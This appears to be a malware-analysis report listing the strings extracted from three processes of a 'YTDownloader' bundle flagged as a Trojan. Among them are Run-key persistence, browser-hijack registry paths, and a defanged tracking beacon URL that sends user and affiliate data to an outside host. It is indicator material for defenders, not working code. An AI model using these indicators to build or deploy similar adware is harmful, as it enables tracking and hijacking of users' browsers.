ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..







The Trojan connects to the servers at the folowing location(s):







BROWSE~2.EXE_3920:




.text
`.rdata
@.data
.rsrc
@.reloc
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
Process token open Error: %u
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb
KERNEL32.dll
USER32.dll
ADVAPI32.dll
GetProcessHeap
GetCPInfo
zcÁ
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
4 5 52585>5
01S1|3
Amscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
BrowserHelper.exe
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Run
e:%d s:%d
\BrowserHelper.exe
C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE

BrowserHelper.exe_3032:




.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
Higher: %x
Lower: %x
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb
WinExec
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegOpenKeyW
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoW
WININET.dll
VERSION.dll
PSAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
.?AVCHttp@@
C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
2/2P3z3
"1*1/141
C1k1y1<3\3c3k3p3t3x3
2%2x2
= >->2>@>
6$6-626?6
;%; ;5;@;
4 4,40444
@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
HTTP/1.1
XXX
Content-Disposition: form-data; name="%s"
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Windows 95
Windows 98
Windows Me
Windows NT
Windows 2000
Windows XP
Windows 2003 Server
Windows Vista
Windows 7
Windows CE
%sLow\%s\
%s\%s\%s\
%C:\Users\Public\Documents\%s\%s\
%s\Application Data\%s\%s\
ConfigDB.dll
config.xml
<d/d/%d d:d:d::d 0x%X>
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::BackupTraceFile] %s
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
\StringFileInfo\x\%s
kernel32.dll
WININET.DLL
user32.dll
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
PipeName
[CUtils::GetDAPPipeName] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
%d.%d.%d.%d
"%s" "%s"
d/d/%d d:d:d::d
"%s" %s
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
%d-d-d
0.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe
%Program Files%\Internet Explorer\IEXPLORE.EXE
http\shell\open\command
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk
Mozilla Firefox
Google Chrome
explorer.exe
&exe%d=%s&ver%d=%s&arr%d=%s
&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d
hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?
BrowserHelper.txt
BrowserHelperBk.txt
Chrome
Mozilla
iexplore.exe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
%s?e=%s
zvl=%s&
1.7.0.0
Updater.exe

YTDownloader.exe_3496:




.text
`.rdata
@.data
.idata
.rsrc
@.reloc
SSShh
WSSh(
SPSSh
.tMHtJH
F><.tN<[tJ<\tF<*tB<|t><^t:<$t6
FTPQ
tL<%u@
9>t.hp
;NTu^SSh
xSSSh
FTPjKS
FtPj;S
C.PjRV
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
CRtmpParser::GetFieldDataString
CRtmpParser::GetFieldDataNumber
NetStream.Play.Reset
NetStream.Unpause.Notify
NetStream.Pause.Notify
NetStream.Seek.Notify
NetStream.Play.Stop
NetStream.Play.Failed
NetStream.Failed
()$^.* ?[]|\-{},:=!
video/WebM
"url_encoded_fmt_stream_map": "(.*?)"
rtmpe%3Dyes
url_encoded_fmt_stream_map=
%s, string reference, index: %d, not supported, ignoring!
%s - AMF3 unknown/unsupported datatype 0xx, @%p
AMF3_DATE reference: %d, not supported!
Property: <%s%s>
timestamp: %.2f, UTC offset: %d
INVALID TYPE 0xx
Property: <%sSTRICT_ARRAY>
Property: <%sECMA_ARRAY>
Property: <%sOBJECT>
AMF_Encode - failed to encode property in index %d
%s, invalid type. %d
%s, failed to decode AMF3 property!
Member: %s
Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d
Class reference: %d
Object reference, index: %d
%s: Empty buffer/no buffer pointer!
%s - unknown datatype 0xx, @%p
AMF_TYPED_OBJECT not supported!
AMF_REFERENCE not supported!
%s: Name size out of range: namesize (%d) > len (%d) - 2
%s: Not enough data for decoding with name, less than 4 bytes!
HTTP/1
%s, Setting socket timeout to %ds failed!
%s, No SSL/TLS support
HTTP_get
If-Modified-Since: %s
GET %s HTTP/1.0
User-Agent: %s
Host: %s
Mozilla/5.0
%s, d %s %d d:d:d GMT
size: x
date: %s
ctim: %s
url: %.*s
%s: couldn't open %s for writing, errno %d (%s)
%s: couldn't contact swfurl %s (HTTP error %d)
%s: swfurl %s not found
%s: connection lost while downloading swfurl %s
1.1.4
%s%s\.swfinfo
%s: %s
hXXp://
[[IMPORT]]
No application or playpath in URL!
Invalid port number!
No hostname in URL!
Parsed protocol: %d
RTMP URL: No :// in url!
NetConnection.confStream
NetStream.Publish.Start
NetStream.Play.UnpublishNotify
NetStream.Play.PublishNotify
NetStream.Play.Complete
NetStream.Play.Start
NetConnection.Connect.InvalidApp
NetStream.Play.StreamNotFound
NetStream.Authenticate.UsherToken
Publisher password
pubPasswd
Key for SecureToken response
Justin.tv authentication token
URL to player SWF file
swfUrl
URL of played media's web page
pageUrl
URL to played stream
tcUrl
DH public key does not fulfill y^q mod p = 1
DH public key must be at most p-2
DH public key must be at least 2
RC4 In Key:
RC4 Out Key:
%s: Couldn't calculate correct DH offset (got %d), exiting!
%s: Couldn't calculate correct digest offset (got %d), exiting
%s: Couldn't calculate DH offset (got %d), exiting!
%s: Couldn't calculate digest offset (got %d), exiting!
RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx
Connecting via SOCKS proxy: %s:%d
SWFSize : %u
live : %s
StopTime : %d msec
StartTime : %d msec
flashVer : %s
NetStream.Authenticate.UsherToken : %s
subscribepath : %s
auth : %s
pageUrl : %s
swfUrl : %s
tcUrl : %s
Playpath : %s
Port : %d
Protocol : %s
s %-7s %s
Unknown option %s
%s://%.*s:%d/%.*s
Problem accessing the DNS. (addr: %s)
%s, error
%s, Authentication failed: unknown auth mode: %s
%s, Authentication failed
%s, new app: %.*s tcUrl: %.*s playpath: %s
&nonce=%s&cnonce=%s&nc=%s&response=%s
%s, md5(%s:%s:%s:%s:%s:%s) =>
%s, md5(%s:/%.*s) =>
%s, md5(%s:%s:%s) =>
%s, pubToken1: %s
?%s&user=%s
%s, Authentication failed: no such user
%s, Authentication failed: wrong password
%s, pubToken2: %s
&challenge=%s&response=%s&opaque=%s
%s, b64(md5_2) = %s
%s, b64(%d) = %s
%s, b64(md5_1) = %s
%s, md5(%s%s%s) =>
%s, par:"%s" = val:"%s"
%s, need to set pubUser & pubPasswd for publisher auth
%s, wrong pubUser & pubPasswd for publisher auth
%-22.*s%s
%s, error decoding meta data packet
%s, received: chunk size change to %d
%s: server BW = %d
%s: client BW = %d %d
%s, recv returned %d. GetSockError(): %d (%s)
POST /%s%s/%d HTTP/1.1
Host: %.*s:%d
Content-length: %d
HTTP/1.1 200
%s, RTMP send error %d (%d bytes)
%s: fd=%d, size=%d
Invoking %s
sanity failed!! trying to send header of type: 0xx.
%s, failed to allocate packet
FCSubscribe: %s
UsherToken: %s
%s, %d, pauseTime=%d
%s, seekTime=%d, stopTime=%d, sending play: %s
sending ctrl. type: 0xx
%s: Ignoring SWFVerification request, use --swfVfy!
%s: SWFVerification Type %d request not supported! Patches welcome...
%s, SWFVerification ping received:
%s, Stream Begin %d
%s, Stream EOF %d
%s, Stream Dry %d
%s, Stream IsRecorded %d
%s, Ping %d
%s, Stream BufferEmpty %d
%s, Stream BufferReady %d
%s, Stream xx %d
%s, received ctrl. type: %d, len: %d
%s, RTMP socket closed by peer
%s, No valid HTTP response found
%s, failed to read RTMP packet body. len: %u
%s, failed to read extended timestamp
%s, failed to read RTMP packet header. type: %x
%s, m_nChannel: %0x
%s, failed to read RTMP packet header 3nd byte
%s, failed to read RTMP packet header 2nd byte
%s, failed to read RTMP packet header
%s: fd=%d
%s: client signature does not match!
%s: Handshaking finished....
%s: Genuine Adobe Flash Media Server
%s: Server not genuine Adobe!
%s: Signature calculated:
%s: Digest key:
%s: Server sent signature:
%s: Wait, did the server just refuse signed authentication?
%s: Client signature calculated:
%s: Calculated digest key from secure key and server digest:
%s: Secret key:
%s: Wrong secret key position!
%s: Server DH public key offset: %d
%s: FMS Version : %d.%d.%d.%d
%s: Server Uptime : %d
%s: Type mismatch: client sent %d, server answered %d
%s: Type Answer : X
%s: Initial client digest:
%s: Client digest offset: %d
%s: Couldn't write public key!
%s: Couldn't generate Diffie-Hellmann public key!
%s: DH pubkey position: %d
%s: Couldn't initialize Diffie-Hellmann!
%s: Client type: X
%s: Genuine Adobe Flash Player
%s: Client not genuine Adobe!
%s: Client sent signature:
%s: 2nd handshake:
%s: Sending handshake response:
%s: Server signature calculated:
%s: Client DH public key offset: %d
%s: Player Version: %d.%d.%d.%d
%s: Client Uptime : %d
%s: Initial server digest:
%s: Server digest offset: %d
%s: Unknown version x
%s: Type Requested : X
%s, RTMP connect failed.
%s, handshaked
%s, handshake failed.
%s, ... connected, handshaking
%s, Could not connect for handshake
%s, no SSL/TLS support
%s, SOCKS returned error code %d
%s, failed to create socket. Error: %d
%s, SOCKS negotiation failed.
%s ... SOCKS negotiation
%s, failed to connect socket. %d (%s)
Closing connection: %s
%s, onStatus: %s
trying to connect with redirected url
%s, error description: %s
%s, received error for method call <%s>
%s, received result id %f without matching request
%s, received result for method call <%s>
%s, server invoking <%s>
%s, error decoding invoke packet
%s, Sanity failed. no string method in invoke packet
%s, flex shared object, size %u bytes, not supported, ignoring
%s, flex message, size %u bytes, not fully supported
%s, received: notify %u bytes
%s, shared object, not supported, ignoring
%s, received: invoke %u bytes
%s, unknown packet type received: 0xx
%s, flex stream send, size %u bytes, not supported, ignoring
%s, received: bytes read report
Wrong data size (%u), stream corrupted, aborting!
Couldn't find the seeked keyframe in this chunk!
First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?
FLV Stream: Keyframe doesn't match!
Found keyframe with resume-keyframe timestamp!
Checked keyframe successfully!
ignoring too small audio packet: size: %d
ignoring too small video packet: size: %d
Got Play.Complete or Play.Stop from server. Assuming stream is complete
%s: Failed to close listening socket, error %d
Caught signal: %d, cleaning up, just a second...
-c, --cert cert RTMPS cert
-k, --key key RTMPS key
-p, --port port Overrides the port in the rtmp url
%s, _beginthread failed with %d
Unknown command '%c', ignoring
-o %s
-j "%s"
-p "%s"
-W "%s"
-f "%s"
-a "%s"
-r "%s"
%s, client invoking <%s>
%s, received packet type X, size %u bytes
%s: accept failed
%s: processed request
%s: accepted connection from %s
%s, listen failed
%s, TCP bind failed for port number: %d
%s, couldn't create socket
chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe
._-$,;~()
.mpeg
video/webm
.webm
.xslt
.json
audio/x-mpegurl
.torrent
.jpeg
.shtml
.shtm
.html
url_rewrite_patterns
ssl_certificate
listening_ports
index.html,index.htm,index.cgi,index.shtml,index.php,index.lp
**.shtml$|**.shtm$
mydomain.com
**.cgi$|**.pl$|**.php$
SSL_CTX_use_certificate_chain_file
SSL_CTX_set_default_passwd_cb
SSL_CTX_use_certificate_file
SSL_CTX_use_PrivateKey_file
%s %s:
[0lu] [error] [client %s]
%.*s%s
%d-%3s-%d %d:%d:%d
%*3s, %d %3s %d %d:%d:%d
%d %3s %d %d:%d:%d
%d/%3s/%d %d:%d:%d
%[^:]:%[^:]:%s
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"
%s:%s:%s
%s.tmp
<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td>  %s</td></tr>
%d-%b-%Y %H:%M
**.htpasswd$
%s%c%s
%a, %d %b %Y %H:%M:%S GMT
HTTP/
%s: CGI env buffer truncated for [%s]
HTTP_%s=%s
REMOTE_USER=%s
PERLLIB=%s
SystemDrive=%s
SYSTEMROOT=%s
COMSPEC=%s
PATH_INFO=%s
PATH=%s
CONTENT_LENGTH=%s
QUERY_STRING=%s
CONTENT_TYPE=%s
HTTPS=%s
PATH_TRANSLATED=%s
SCRIPT_FILENAME=%s
SCRIPT_NAME=%.*s%s
REQUEST_URI=%s
REMOTE_PORT=%d
REMOTE_ADDR=%s
REQUEST_METHOD=%s
SERVER_PORT=%d
SERVER_PROTOCOL=HTTP/1.1
DOCUMENT_ROOT=%s
SERVER_ROOT=%s
SERVER_NAME=%s
Cannot SSI #exec: [%s]: %s
Bad SSI #exec: [%s]
HTTP/1.1 200 OK
<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>
HTTP/1.1 207 Multi-Status
%d.%d.%d.%d%n
%d.%d.%d.%d/%d%n
%lf%c
%s/%s
boundary=™s
HTTP/1.1 302 Found
Location: hXXps://%s:%d%s
24[^:]
%d.%d.%d.%d:%d%n
Cannot add SSL socket, is -ssl_certificate option set?
%s: %.*s: invalid port spec. Expecting list of: %s
[IP_ADDRESS:]PORT[s|p]
%s: cannot bind to %.*s: %s
set_ports_option
%s - %s [%s] "%s %s HTTP/%s" %d %I64d
%d/%b/%Y:%H:%M:%S %z
%s: subnet must be [ |-]x.x.x.x[/x]
Cannot open %s: %s
calloc(): %s
connect(%s:%d): %s
socket(): %s
gethostbyname(%s): %s
%s: %s is not allowed to connect
HTTP/1.1 %d %s
Content-Length: %d
Connection: %s
Error %d: %s
%s: CreateProcess(%s): %ld
%s%s%s\%s
%.*s%c%s
.htpasswd
fopen(%s): %s
%s: cannot open %s: %s
<tr><td><a href="%s%s">%s</a></td><td> %s</td><td>  %s</td></tr>
<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>
Error: opendir(%s): %s
Date: %s
Last-Modified: %s
Etag: %s
HTTP/1.1 100 Continue
Cannot create CGI pipe: %s
fopen: %s
CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]
Cannot spawn CGI process [%s]: %s
put_dir(%s): %s
HTTP/1.1 %d OK
Bad SSI #include: [%s]
Cannot open SSI #include: [%s]: fopen(%s): %s
%s: SSI tag is too large
%s: unknown SSI command: "%s"
SSI #include level is too deep (%s)
Method %s is not implemented
HTTP/1.1 301 Moved Permanently
Location: %s/
remove(%s): %s
Bad HTTP version
Bad HTTP version: [%s]
Invalid URI: [%s]
%s: option value cannot be NULL
Invalid option: %s
warning: %s: duplicate option
Hello from mongoose! Remote port: %d
HttpSendRequestW failed with error code
HttpOpenRequestW failed with error code
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
Visual C   CRT: Not enough memory to complete call to strerror.
cmd.exe
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb
.?AVCHttp@@
<>"#{}|\^~[]`' ?&
.?AVCRtmpe@@
.?AV?$IBaseInterface@VIKeysBank@@@@
.?AVIKeysBank@@
.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@
.?AVCKeysBank@@
.?AVCRtmpDataProperty@@
.?AVCRtmpPacket@@
.?AVCRtmpParser@@
.?AVChromeBrowserWindow@@
.?AVFirefoxBrowserWindow@@
.?AVOperaBrowserWindow@@
HTTP://
.?AVHttpParser@@
.?AVCHttpDownload@@
zcÁ
WinExec
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjectsEx
EnumChildWindows
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
LIBEAY32.dll
HttpEndRequestW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
VERSION.dll
CertGetNameStringW
CertFreeCertificateContext
CryptMsgClose
CertCloseStore
CertFindCertificateInStore
CryptMsgGetParam
CRYPT32.dll
PSAPI.DLL
IsValidURL
urlmon.dll
GdiplusShutdown
gdiplus.dll
GetCPInfo
GetProcessHeap
nnn%XXX
pppaSSS
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
89x9
0-161T1k1}1
0(191?1`2
8&9-9}9
<041&3.3
;$;(;,;0;4;8;<;@;
<(</<4<8<<<]<
<&=,=0=4=8=
= =$=(=,=0=4=8=
: :(:,:0;4;
? ?$?,?0?8?<?
? ?(?,?0?
1 2,242\2
?$?0?8?`?
8(848\8|8
0$000\0|0
>(>4><>`>
?$?<?@?\?`?
0 0@0`0|0
3 3@3`3|3
1$1,141<1
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
Content-Disposition: form-data; name="%s"
XXX
Content-Type: multipart/form-data; boundary=%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Windows CE
Windows 7
Windows Vista
Windows 2003 Server
Windows XP
Windows 2000
Windows NT
Windows Me
Windows 98
Windows 95
%sLow\%s\
%C:\Users\Public\Documents\%s\%s\
%s\%s\%s\
%s\Application Data\%s\%s\
[CEventsThread::SetTimeoutResolution] From: %d -> To: %d
[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
[CEventsThread::WaitForMultipleEvents] TID=%X
[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
[CEventsThread::Start - Leave] TID=%X
[CEventsThread::Start] ___Error - Failed to create thread: %X
[CEventsThread::Stop - Leave] TID=%X
[CEventsThread::Stop - Enter] TID=%X
[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
[CEventsThread::AlertEvent] ___Error SetEvent failed: %d
[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
[CEventsThread::AlertEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] Event: %d
[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
[CEventsThread::ResetEvent] ___Error Not found Event: %d
[CEventsThread::ResetEvent] Event: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
[CEventsThread::WaitEvent] TID=%X
[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
[CEventsThread::RemoveEvent] ___Error Not found Event: %d
[CEventsThread::RemoveEvent] Event: %d
[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
[CEventsThread::Cleanup] Closing Handle: %d
[CEventsThread::Work] TID=%X - Exit !!!
[CEventsThread::Work] WAIT_ABANDONED - %d
[CEventsThread::Work] TID=%X
[CEventsThread::AddEvent] ___Warning event handle already exists %d
[CEventsThread::AddEvent] ___Error invalid event handle %d
ConfigDB.dll
config.xml
%%X
<d/d/%d d:d:d::d 0x%X>
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
\StringFileInfo\x\%s
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::BackupTraceFile] %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
CertGetNameString failed.
CryptDecodeObject failed with %x
CertFindCertificateInStore failed with %x
MoreInfo Link : %s
Publisher Link : %s
Program Name : %s
CryptMsgGetParam failed with %x
CryptQueryObject failed with %x
user32.dll
WININET.DLL
kernel32.dll
d/d/%d d:d:d::d
%d.%d.%d.%d
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
"%s" "%s"
"%s" %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPPipeName] Name: %s
PipeName
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey
[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
[CClientRtmpe::operator =] Key Out: %p
[CClientRtmpe::operator =] Key In:
[CClientRtmpe::operator =]
[CClientRtmpe::OnHandshake] Step 3 - update the keystreams
[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 2 - Client version: %x
[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d
[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d
[CKeysBank::Work] Exit...
[CKeysBank::Work] Enter...
[CKeysBank::Start]
[CKeysBank::Stop]
[CKeysBank::GetPublicKey] Remove Key, Total: %d
[CKeysBank::GenerateKey] Add Key, Total: %d
[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey
[CKeysBank::GenerateKey] ___Error DiffieHellman.Init
[CRtmpe::operator =] Key Out: %p
[CRtmpe::operator =] Key In:
[CRtmpe::operator =]
[CRtmpe::Initialize] Cache Writer: %p
[CRtmpe::ParseHeader] Protocol - RTMPE
[CRtmpe::ParseHeader] Protocol - RTMP
[CRtmpe::ParseHeader]
[CRtmpe::ParseData] Got all %d/%d bytes
[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)
[CRtmpe::ParseData]
[CRtmpe::Encrypt] Encryped %d bytes, Key: %p
[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p
[CRtmpe::ParseBuffer] Analyze Next Packet...
[CRtmpe::HandShake] Step 1: Complete
[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server
[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey
[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
[CRtmpe::HandShake] Step 1: Start...
[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes
[CRtmpe::UpdateBuffer] Handshake already completed
[CRtmpe::UpdateBuffer] Analyzing %d bytes...
[CRtmpStream::OnHandShake] ___Error - Unknown step
[CRtmpe::OnHandshake] Step 3 - Complete
[CRtmpe::OnHandshake] Step 3 - update the keystreams
[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption
[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey
[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CRtmpe::OnHandshake] ___Error Step 3: Writing client response
[CRtmpe::OnHandshake] Step 3: Start...
[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***
[CRtmpe::OnHandshake] ___Warning - server version
[CRtmpe::OnHandshake] ___Error Step 2: Reading server response
[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***
[CRtmpe::OnHandshake] Step 2 - Server version: %x
[CRtmpe::OnHandshake] Step 2 - Server up time: %d
[CRtmpe::OnHandshake] ___Error Step 2: Reading server signature
[CRtmpe::OnHandshake] Step 2 - Protocol: %d
[CRtmpe::OnHandshake] Step 2: Start...
[CRtmpPacket::Reset]
[CRtmpPacket::DumpHeader] Info Field: %d
[CRtmpPacket::DumpHeader] Packet Type: %d
[CRtmpPacket::DumpHeader] Packet Length: %d
[CRtmpPacket::DumpHeader] Absolute Time: %d
[CRtmpPacket::DumpHeader] Time: %d
[CRtmpPacket::DumpHeader] Channel: %d
[CRtmpPacket::DumpHeader] Header Type: %d
[CRtmpPacket::DumpHeader] Header Size: %d
[CRtmpPacket::DumpHeader] Header Byte: 0x%.02X
[CRtmpPacket::ParseHandshakeHeader] ___Error - Header already parsed
[CRtmpPacket::ParseFlvHeader] Absolute Time: %d
[CRtmpPacket::ParseFlvHeader] Packet Length: %d
[CRtmpPacket::ParseFlvHeader] Packet Type: %d
[CRtmpPacket::ParseFlvHeader] Channel: %d
[CRtmpPacket::ParseFlvHeader] Header Type: %d
[CRtmpPacket::ParseFlvHeader] Header Size: %d
